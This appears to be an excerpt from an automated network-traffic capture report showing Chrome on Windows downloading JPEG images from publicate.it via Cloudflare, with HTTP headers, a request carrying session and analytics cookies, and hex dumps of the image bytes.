                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "5989-620aa1d14fbe0"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMJh9t9YKmSQhGqJwhEeeviiyQeBsBG19Hoz1H%2BJrcMyb7EJ3G8g%2BjY2g%2B8GlALjv9Dz%2B6v3Qp%2F%2BvIyXGGj0RxYcTALNSWwgNqrTgwoBcvB7bgwrbCGW90DToIfBjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d0cc280c94-EWR
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC615INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 a8 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 04 01 03 05 06 07 02 08 ff c4 00 57 10 00 01 03 02 01 05 09 0b 07 09 06 05 04 02 03 00 01 00 02 03 04 11 05 06 12 13 21 31 07 16 32 33 41 51 55 71 93 14 17 22 52 61 72 81 91 92 a1 d1 15 53 54 62 b1 b2 d2 23 34 35 42 63 74
                                                                                                                                                                                                        Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("W!123AQUq"RarSTb#45Bct
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 7d 06 0b 89 e2 10 99 68 70 fa aa 88 86 d7 c7 19 23 d6 92 a7 46 2b 32 49 76 11 ab 5e 4f 11 93 7f 9b 24 6f 9b 1b e9 6a ce d1 37 cd 8d f4 b5 67 68 b1 52 c6 f8 a4 74 72 b1 cc 91 a6 ce 6b 85 88 3e 50 57 95 6d 8d 2e 95 d8 8d bd 55 ff 00 27 dd 99 7d f3 63 7d 2d 59 da 26 f9 b1 be 96 ac ed 16 32 9e 09 6a 66 6c 34 f1 3e 59 5c 6c d6 31 a5 c4 f5 00 a4 e2 18 46 23 86 b5 ae af a1 a9 a6 6b b5 07 49 19 00 fa 55 5d 3a 29 e1 a5 9f c8 95 56 bb 5a c9 bc 7e 64 ad f3 63 7d 2d 59 da 26 f9 b1 be 96 ac ed 16 21 15 b6 34 fa 57 62 be 22 af 53 ee cc be f9 b1 be 96 ac ed 13 7c d8 df 4b 56 76 8b 10 89 b1 a7 d2 bb 0f 11 57 a9 f7 66 5f 7c d8 df 4b 56 76 89 be 6c 6f a5 ab 3b 45 88 44 d8 d3 e9 5d 87 88 ab d4 fb b3 2f be 6c 6f a5 ab 3b 44 df 36 37 d2 d5 9d a2 c4 22 6c 69 f4 ae c3 c4 55 ea
                                                                                                                                                                                                        Data Ascii: }hp#F+2Iv^O$oj7ghRtrk>PWm.U'}c}-Y&2jfl4>Y\l1F#kIU]:)VZ~dc}-Y&!4Wb"S|KVvWf_|KVvlo;ED]/lo;D67"liU
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: a7 96 36 bb 39 ac 7b 9a 1d ce 01 b5 d7 84 45 d0 2e 47 3a c2 22 21 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 76 ad cb 31 02 ec 92 8a 37 92 4c 32 be 31 e4 1b 47 da 8b 15 b9 6f fc bb 37 ef 2f fb ad 45 ca 5d c1 2a d2 f9 9d 8d 9c db a1 0f 91 cf 32 9b fe 62 c5 3f 79 93 ef 15 8d b2 fa 0f 7b 78 2d 47 e5 a7 c2 a8 a4 96 4f 09 ef 74 40 97 13 b4 94 de b6 03 d0 f4 1d 88 5e 94 34 b4 23 15 1d 57 c0 f2 aa 68 7a 92 93 96 b2 e2 7c f9 64 b2 fa 13 7a d8 0f 43 d0 76 21 37 ad 80 f4 3d 07 62 15 b7 bd 3e 96 53 72 d4 ea 47 cf 76 4b 2f a1 37 ad 80 f4 3d 07 62 13 7a d8 0f 43 d0 76 21 37 bd 3e 96 37 2d 4e a4 7c f7 64 b2 fa 13 7a d8 0f 43 d0 76
                                                                                                                                                                                                        Data Ascii: 69{E.G:"!D@DDD@DDD@DDD@DDD@DDD@v17L21Go7/E]*2b?y{x-GOt@^4#Whz|dzCv!7=b>SrGvK/7=bzCv!7>7-N|dzCv
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 91 48 2d 07 68 56 9e cb 6b 1b 11 30 d1 e1 11 14 90 11 11 01 02 bf 8f 1e 68 44 af e3 c7 9a 11 09 25 c1 c4 47 d4 ae 2b 70 71 11 f5 2b 88 40 55 68 ce 75 95 15 d8 46 a2 51 84 5c 02 c2 c1 11 0a a1 70 8b 5b ca 1c b5 c1 b0 2a ae e6 ac 9d ef a8 00 17 47 0b 33 cb 41 d9 7e 40 b1 3d f4 72 7f fc 6f 61 fe ab 62 16 95 e6 b5 a3 06 d7 c8 d4 9d fd b5
                                                                                                                                                                                                        Data Ascii: yX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjH-hVk0hD%G+pq+@UhuFQ\p[*G3A~@=roab
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: e7 ee be 4b fb 9f 3f 65 33 a1 c1 6b 4d 2b 66 d3 bc 1e 18 69 0d b7 52 c8 64 ee 18 31 da 57 cb 4f 53 1b 1c c3 62 d7 02 55 8d d0 e1 a4 7e 35 21 7c 6e ce 05 c2 e3 ad 4b dc 86 20 2b 31 3d 13 9c 63 0d 66 a3 c8 6e 57 3d 4b 4a 69 28 cf 5e 72 e0 fe 1c 0f a6 5d 7b 39 ec e4 ec 14 29 43 15 22 bd 5e 5f af 9f 13 25 83 e4 dd 4c 78 eb 21 aa 80 cb 9a d3 24 61 83 39 b2 38 6c 1d 57 58 fa fc 91 c7 ea 72 be 86 4c 4a 9d a6 94 cf 1b a4 76 94 5c 37 38 5f 55 d7 6d c0 5b 1c 31 49 3b c8 04 78 1a f9 07 3a e7 5b a1 e3 ee a3 ad 8d f1 b4 b8 36 56 82 e7 92 05 af c8 16 a6 97 d2 d5 2b 6a fd 94 df 2f fc 34 3d 9e d1 53 b4 ab 2a 36 93 71 4f 8f 97 d5 9b 06 e8 98 ed 26 17 42 e8 5b 2c 71 46 d2 3c 16 36 ff 00 62 e5 b8 ae 37 85 63 98 64 f4 15 72 44 f3 23 48 8d f2 44 41 63 b9 1c 0a ca 6e c1 57 09
                                                                                                                                                                                                        Data Ascii: K?e3kM+fiRd1WOSbU~5!|nK +1=cfnW=KJi(^r]{9)C"^_%Lx!$a98lWXrLJv\78_Um[1I;x:[6V+j/4=S*6qO&B[,qF<6b7cdrD#HDAcnW
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: da 93 e2 9b b2 e3 d3 ea 88 df 76 9d 5f 46 75 d4 5c 8f be 8e 25 d1 d4 3e d4 9f 14 ef a3 89 74 75 0f b5 27 c5 37 65 c7 a7 d5 0d f7 69 d5 f4 67 5c 45 c8 fb e8 e2 5d 1d 43 ed 49 f1 54 ef a3 89 74 75 0f b5 27 c5 37 65 c7 a7 d5 0d f7 69 d5 f4 67 5d 45 c8 bb e8 e2 5d 1d 43 ed 49 f1 4e fa 38 97 47 50 fb 52 7c 53 76 5c 7a 7d 50 df 56 9d 5f 46 75 d4 5c 8b be 8e 25 d1 d4 3e d4 9f 14 ef a3 89 74 75 0f b5 27 c5 37 65 c7 a7 d5 0d f5 69 d5 f4 67 5d 45 c8 7b e9 62 5d 1d 43 ed 49 f1 4e fa 58 97 47 50 fb 52 7c 53 76 5c 7a 7d 50 df 56 9d 5f 46 75 e4 5c 87 be 96 25 d1 d4 3e d4 9f 15 4e fa 58 9f 47 50 fb 52 7c 53 76 5c 7a 7d 50 df 56 9d 5f 46 75 f4 5c 83 be 9e 25 d1 d4 3e d4 9f 14 ef a5 89 93 61 86 d0 df ce 93 e2 9b b6 e3 d3 ea 89 df 56 8f fe 4f b3 3a fa 2e 7b 5d 97 75 38 76
                                                                                                                                                                                                        Data Ascii: v_Fu\%>tu'7eig\E]CITtu'7eig]E]CIN8GPR|Sv\z}PV_Fu\%>tu'7eig]E{b]CINXGPR|Sv\z}PV_Fu\%>NXGPR|Sv\z}PV_Fu\%>aVO:.{]u8v
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 02 64 71 e5 da 3d 6b 9a e5 83 31 69 ea e0 c4 f1 86 32 d5 91 35 d0 c9 10 b3 0b 6d 70 de b1 7e 5d 6b 25 b5 dc eb 4f 2d 62 2f 97 ab 30 dd d9 53 b7 a7 85 26 e6 b1 9c 72 49 9a f2 2a d9 2c bd 03 cb 29 65 4b 2f 56 44 07 94 55 44 05 11 55 14 60 14 45 5b 2f 6c 61 7b 83 5a 09 71 36 00 72 94 1c cf 2c 8d d2 3d ad 8d ae 73 9c 6c 1a d1 72 4a d9 68 f2 17 1d a9 8d af 7d 33 29 da ed 63 4e f0 d3 ea d6 57 4d c8 8c 94 87 27 b0 f6 d4 d5 46 d7 62 72 b6 ef 71 17 d1 0f 15 bf d4 a9 72 cc e9 27 74 99 dd 56 5c d5 ee 9c 70 93 8d 05 cb cd 9d 9e 8c f6 66 35 60 a7 72 df 1f 24 72 5c 4f 23 6b f0 d8 c4 95 53 52 e6 13 6f 01 c4 9f 55 96 a3 89 d5 c7 04 86 2a 77 45 9e 0f 0a 47 5f dc 17 4b cb 79 67 aa 8f 49 62 e6 bd 97 68 bd 80 1c 97 5c 2a a4 96 cf 20 b0 be 71 5c c5 d6 9f bb ad 2d 55 2c 25 e9
                                                                                                                                                                                                        Data Ascii: dq=k1i25mp~]k%O-b/0S&rI*,)eK/VDUDU`E[/la{Zq6r,=slrJh}3)cNWM'Fbrqr'tV\pf5`r$r\O#kSRoU*wEG_KygIbh\* q\-U,%
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: b1 69 51 b4 bd ed 63 76 b8 80 3d 2b bc 64 6c 31 50 3a 9a 8e 21 60 21 24 f9 4f 3a f1 34 d5 f3 b6 84 69 43 9c ff 00 a7 99 d1 fb 3b a3 55 dd 49 56 9f dd 87 f5 f2 ec 6c 58 81 3a 37 75 2d 46 bd e6 2a 0a 99 75 5d 91 3d de a0 56 e1 5c 2e c7 75 2d 23 19 f0 f0 9a f6 37 69 86 40 3d 92 b8 da dc cf a2 5a f2 e0 60 72 91 ac 8a 82 89 84 00 1b 4e c1 af a9 72 6c 43 b8 fb a2 5d 51 ed f1 57 5b cb 38 5c e8 a9 48 70 d7 4c cd 5c da 97 20 ad a4 93 4f 25 cb 76 f3 aa aa 14 13 e3 23 a3 b2 bb bd 85 35 b1 a7 94 62 aa e9 e9 de 4e 8f 34 1f 21 b2 eb 1b 9a 44 e6 64 ad 2b 5d af c3 92 de d2 e4 d5 34 af bf ea fa d7 68 c8 2a 7e e7 c9 6c 39 8f 1e 11 8f 38 fa 49 2a 65 4a 94 3e d4 1e 4b df 5f dd d6 a3 b2 b8 a7 aa b3 9c e4 d9 e0 6e cf 04 2d b6 8a 16 51 53 35 91 f0 a4 f0 9c 49 e5 b2 d5 e1 1b 2c
                                                                                                                                                                                                        Data Ascii: iQcv=+dl1P:!`!$O:4iC;UIVlX:7u-F*u]=V\.u-#7i@=Z`rNrlC]QW[8\HpL\ O%v#5bN4!Dd+]4h*~l98I*eJ>K_n-QS5I,
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 36 ad b7 6a d3 71 38 dc 64 a8 88 ea 0f 04 0f 48 5b 94 32 0a 9a 56 48 dd 79 ed 05 6b 38 ec 25 93 09 4e cd 96 5c c5 7e 2b 59 1d 7d a3 d5 96 ab 39 d6 39 88 4d 2e 1f 4c f9 1e d2 45 3b 05 ed cc 2c 57 25 aa c5 6a 5d 3c 9c 5f 08 fe aa ea d8 ed 0c cc a3 90 36 27 39 81 cf 00 b7 5e ab 93 fd 57 21 a8 a5 9c 54 48 04 12 f0 8f ea 15 e3 6b 54 52 79 67 d4 74 15 2a 32 a6 d3 c1 62 6a da 89 0d 83 85 ce a1 66 af a1 70 48 1d 4d 86 52 43 b7 47 0b 1a 7a c0 0b 87 e0 38 35 55 5e 2b 46 c3 4e f6 c6 65 6e 71 70 b6 ab eb 5d f6 11 ca dd 4b 66 8c a4 f3 93 cc f6 9f 67 17 4e 9d 3c 79 b2 5c 36 36 b6 a2 bd be 6d 1c d9 af e0 bc 6b 2b cc 7b 3c 20 b4 5c 7b 2b e2 6e 57 4b 81 34 b4 34 41 9a 24 fd b1 d7 9b ea f7 ac f1 86 d2 51 8f ab 39 58 53 94 94 dc 56 75 53 7d 8d e0 3e 37 c2 75 82 d2 2e 17 21
                                                                                                                                                                                                        Data Ascii: 6jq8dH[2VHyk8%N\~+Y}99M.LE;,W%j]<_6'9^W!THkTRygt*2bjfpHMRCGz85U^+FNenqp]KfgN<y\66mk+{< \{+nWK44A$Q9XSVuS}>7u.!
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: f9 28 df 04 a7 80 7c 03 ce 39 54 dc 6e 9f 49 0b 87 a4 2d 13 20 71 d6 d5 53 b6 07 bb 36 b2 1d 7a ff 00 5c 73 ae 92 e2 da 9a 60 f6 ec 22 eb 80 9d 09 d0 6e da a7 de 89 f5 18 dd 53 b9 6a ea 8f dd 91 cf 2a a3 73 e9 66 02 c0 e7 5f dd fe 8b 4a a9 a3 9b 48 fb 06 ed e7 5d 46 7a 06 1a 89 d8 fb 80 e6 e7 34 8e 42 b5 8a 8c 29 9a 47 fe 55 db 79 97 39 79 5a a5 29 e1 1d 56 8f bc 50 4d 1a f6 4f 61 ef 18 a3 24 79 69 cc 05 d6 0b 74 89 a0 ec da a1 61 f4 51 d3 b9 ce 8e e5 c7 51 25 65 23 60 27 58 5b 36 b3 94 a9 a9 4b cc c5 7d 5f 6f 53 5b d0 87 8e 62 23 09 c2 27 aa 20 39 ed 69 11 b4 fe b3 f9 02 f9 b2 b0 d4 d6 57 e9 f3 9c ea c7 cb 9c 5d ca 5c 4d ef eb 5d 7b 2e eb 9d 5d 33 63 85 c4 c1 03 b3 40 f1 8f 29 5a 6c 18 7c 74 f5 52 4c 45 e4 71 d4 3c 5e 7f 4a f4 74 75 a4 f4 95 75 1a 5c 93
                                                                                                                                                                                                        Data Ascii: (|9TnI- qS6z\s`"nSj*sf_JH]Fz4B)GUy9yZ)VPMOa$yitaQQ%e#`'X[6K}_oS[b#' 9iW]\M]{.]3c@)Zl|tRLEq<^Jtuu\


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        114192.168.2.549898104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC703OUTGET /images/nhph3-p-500.jpg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 18724
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "4924-620aa1d24ea10"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fu7e06bd8NdsL4bVIq1dt9P3%2BnNq4X3wzoADDAiNiBkQPBeYfFxqprY89z9frx7nmMd8USrocvaGhqEOUmQ%2B%2FVnU%2BKSLgJkLyD0sex4brgeh4SOHYEnBmjO0CraT1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d10a157cab-EWR
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC619INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 75 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 ff c4 00 53 10 00 01 03 02 01 07 06 0a 08 03 05 06 05 04 03 00 01 00 02 03 04 11 05 06 12 13 21 31 51 91 14 41 52 61 71 d1 07 22 32 33 53 72 81 92 a1 b1 16 17 23 54 55 63 93 c1 08 15 42 62 73 a2
                                                                                                                                                                                                        Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((u"S!1QARaq"23Sr#TUcBbs
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 75 52 c8 c0 e1 1b 00 3b dc 7b 97 cc be 0d f2 ab 0c a8 c6 30 fa 9a bc ca 39 59 3b 4c a4 79 07 af ab e4 be 94 a4 20 d3 b0 82 08 37 20 8e d2 b9 d2 94 9b 6a 47 5c 44 21 1b 38 6c cb 9e 51 2f 42 3f 78 f7 27 28 97 a1 1f bc 7b 94 11 76 33 13 d3 cb d0 8f de 3d c9 a7 97 a1 1f bc 7b 94 10 ec 40 6a 39 45 e1 16 97 03 c4 9f 45 51 43 3c b2 35 e1 85 d1 b9 b6 bd af ce b6 e8 6a e4 96 18 e4 11 b0 07 b4 38 02 e3 ce 2f b9 70 af 09 e3 3b 2b 67 fe fc 7f d8 bb 7d 17 fb 95 3f f7 4c ff 00 b4 2e 54 e6 e4 da 66 8a b4 d4 23 16 bc 4b 9d 3c bd 08 fd e3 dc 9a 79 7a 11 fb c7 b9 45 78 ba 99 c9 e9 e5 e8 47 ef 1e e5 8f c7 71 b3 83 e1 92 d6 cf 06 92 38 c8 05 ac 76 b3 73 6e 75 7a b5 9f 08 e6 d9 25 55 d6 e6 7c d5 66 ed 16 d1 7a 6b 34 d2 65 ee 4d 65 53 31 f6 ca 69 a9 5d 10 88 34 9d 23 86 bb f6
                                                                                                                                                                                                        Data Ascii: uR;{09Y;Ly 7 jG\D!8lQ/B?x'({v3={@j9EEQC<5j8/p;+g}?L.Tf#K<yzExGq8vsnuz%U|fzk4eMeS1i]4#
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 58 d1 fe 00 ba 51 bb 77 65 71 36 50 71 48 ee 83 62 20 d8 8b 59 e7 84 44 40 11 11 00 44 44 01 11 10 1c 53 c2 d6 37 25 76 3a 70 e8 de 79 35 1d 81 68 d8 e9 08 d6 4f 66 ce 2b 44 59 3c a9 71 7e 52 e2 ae 71 b9 e5 32 6b ff 00 d4 56 31 7d 96 16 9a a7 46 31 5d 0f 88 c5 d4 75 6b 4a 4f a8 44 45 dc ce 67 b2 63 25 71 2c a3 32 3a 85 91 b2 18 ce 6b a6 95 d6 6d f7 0e 72 55 be 51 e4 f6 21 93 d5 4c 87 11 8d a0 3c 13 1c 8c 37 63 c0 db 63 bf a9 74 5f 04 d9 41 87 43 82 bb 0d aa 9e 2a 7a 98 e4 73 c6 91 c1 a2 40 ed 77 04 f3 8d 96 58 df 0b d8 f5 06 20 da 3a 0a 19 a3 a8 92 17 99 24 92 33 9c d6 ea b0 6d f9 cf 72 f3 23 8a ae f1 4e 93 8f 77 f3 53 d5 96 12 82 c2 2a aa 5d ef cd 0e 6c b6 ec 2b c1 f6 37 89 61 cd ac 63 60 85 8f 6e 74 6c 99 e5 ae 78 e6 36 b6 ab f5 ad 45 7d 0b 82 65 4e 0f
                                                                                                                                                                                                        Data Ascii: XQweq6PqHb YD@DDS7%v:py5hOf+DY<q~Rq2kV1}F1]ukJODEgc%q,2:kmrUQ!L<7cct_AC*zs@wX :$3mr#NwS*]l+7ac`ntlx6E}eN
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: de 9f 43 72 7b f0 9a 6e 07 bd 39 bd 3f 2b 1c 9a af 99 1c 05 17 7e fa 1b 93 df 84 d3 70 3d e9 f4 37 27 bf 09 a6 e0 7b d3 9b d3 f2 bf b0 e4 d5 7c c8 e0 28 bb f7 d0 dc 9e fc 26 9b 81 ef 4f a1 b9 3d f8 4d 37 03 de 9c de 9f 95 fd 87 26 ab e6 47 01 45 df be 86 e4 f7 e1 34 dc 0f 7a 7d 0d c9 ef c2 69 b8 1e f4 e6 f4 fc af ec 39 35 5f 32 38 0a 2e fd f4 37 27 bf 09 a6 e0 7b d3 e8 6e 4f 7e 13 4d c0 f7 a7 37 a7 e5 7f 61 c9 aa f9 91 c0 51 77 ef a1 b9 3d f8 4d 37 03 de 9f 43 72 7b f0 9a 6e 07 bd 39 bd 3f 2b fb 0e 4d 57 cc 8e 02 8b bf 7d 0d c9 ef c2 69 b8 1e f4 fa 1b 93 df 84 d3 70 3d e9 cd e9 f9 5f d8 72 6a be 64 70 15 ec 43 ed e2 f5 db f3 0b be fd 0d c9 ef c2 69 b8 1e f5 07 64 7e 4f b4 82 dc 26 98 10 41 06 c7 bd 43 ed 7a 6d 7d 2c 95 d8 d5 53 fa 91 f1 77 85 3a b2 ec a2
                                                                                                                                                                                                        Data Ascii: Cr{n9?+~p=7'{|(&O=M7&GE4z}i95_28.7'{nO~M7aQw=M7Cr{n9?+MW}ip=_rjdpCid~O&ACzm},Sw:
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: e6 e5 0e 55 67 36 c7 96 c4 2d ff 00 f1 e3 59 d2 dc e6 91 bc 59 76 5b 19 db d4 d7 eb b1 ac 36 81 f0 8a 98 e0 66 95 c1 ad 27 37 59 3d 8a ce af 2b 30 a8 26 96 27 d3 b9 c6 31 77 9d 1b 40 1c 6d db d8 b3 cc c2 a9 58 f0 5b a4 0e 1a ec 24 3f 25 af 62 3e 0f 30 4c 41 d7 aa 6d 53 8e df 16 50 0f 1b 5d 44 af fe 25 e1 93 fc 8c bc f5 98 64 0c 63 a7 8d 8c 25 8d 7d b4 37 b0 70 b8 d8 15 2a 16 08 72 b7 27 dc f6 c0 d9 a5 86 ac 38 c2 dc d6 bb c5 61 16 be bd 8a 8e 27 0e 4f c4 e8 63 c4 aa 61 6b e9 a3 6b 1a 24 a8 73 5c 00 1a af 62 2f a9 46 af 32 a3 29 f2 4e 5a 37 36 68 1e 2a 83 1c c7 67 02 d3 06 a2 0f 38 d4 ac d6 85 56 e6 f3 5e 46 8c 0d 47 5a c6 8a 58 33 73 84 63 38 92 4a 9b a9 65 3f f2 8a 0a 69 03 4f d9 39 72 6a e7 43 92 56 65 88 c8 dc 86 c6 27 84 8e 5f 57 54 e8 69 41 fe 9b 37
                                                                                                                                                                                                        Data Ascii: Ug6-YYv[6f'7Y=+0&'1w@mX[$?%b>0LAmSP]D%dc%}7p*r'8a'Ocakk$s\b/F2)NZ76h*g8V^FGZX3sc8Je?iO9rjCVe'_WTiA7
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 14 29 fc c4 7e a8 53 40 11 11 00 44 44 01 11 10 14 ea 00 31 39 df d4 d1 9c 0e e2 aa 0d 8a 13 f9 89 3d 53 f2 53 1b 02 03 c7 1c d6 92 76 01 75 18 99 ab 39 da de 76 9d dd 49 37 99 7f aa 54 c6 c0 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 0a 94 fe 41 ec 55 55 29 fc 83 d8 80 e7 95 d4 82 9a 67 55 53 b4 37 38 de 56 8e 7f ed 76 ac 66 52 b4 d6 41 4d 44 d3 7e 53 23 73 80 e8 83 73 f2 5b 43 da 0d c1 17 07 99 61 a0 a2 d1 d5 c8 e9 4e 73 9a 2d 1f f6 58 b8 49 7f 8f 53 44 25 6e f7 42 e1 83 34 0b 70 50 8d 80 17 b8 0d ae ba ac 6d 65 e0 b5 ac ae d1 cd 32 74 e0 18 99 fd 92 42 ab 6b 9d 4a ca 8e 76 b6 a6 78 1e 4d c5 9e d1 bc 15 77 24 97 60 b6 ab f3 21 3e 25 39 dd 9b 66 b3 da 52 39 a3 8e 10 e9 21 12 1b ed 26 c4 2f 25 1b 7b 15 86 25 23 a3 c3 a7 73 1d 9a e6 ec 2b
                                                                                                                                                                                                        Data Ascii: )~S@DD19=SSvu9vI7T""" """ AUU)gUS78VvfRAMD~S#ss[CaNs-XISD%nB4pPme2tBkJvxMw$`!>%9fR9!&/%{%#s+
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 8e 35 95 5f ce 5a 5b 0e 8f c4 fb 46 3e e6 ff 00 d9 68 3b 14 54 8a 84 5a 47 5a 52 73 92 6c c5 12 5d 51 21 1b 33 96 e7 82 02 cc 2e 10 2d ac 13 ac ef 2b 49 ac ab a4 c3 68 a7 ae c4 67 8e 9e 96 21 9c f9 64 36 0d 1f fc e6 5c da af c3 cc 34 f5 0f 8b 0e a5 a8 9e 99 ae 2d 63 de c6 32 e3 9a c2 f7 e2 b2 60 e2 dd d9 b3 19 25 64 8e d9 97 18 24 99 45 92 d8 96 17 1b 98 d9 66 8b ec dc 4e a0 f0 6e df 88 5f 12 e2 d4 d3 d0 e2 15 14 b5 91 3a 2a a8 5e 59 2c 6e d4 5a e1 a8 85 df 30 ef 0e b4 53 10 2a 9b 2d 31 3c ef a6 0f 6f 16 bf f6 58 0c bf c9 d6 f8 41 90 e3 99 2c 22 a9 c4 33 6d 3b 29 9b aa 7b 6c 24 07 1b 3b b7 6a de b4 dd 98 3e ad 91 c4 dc ed b6 d8 a9 48 fd 57 be b5 94 c4 f2 77 1b c3 62 96 4a fc 23 10 a6 8e 23 9a f7 cb 4e e6 b5 a7 ac da cb 08 2e f7 75 29 5a 95 b5 b7 2a c2 2f
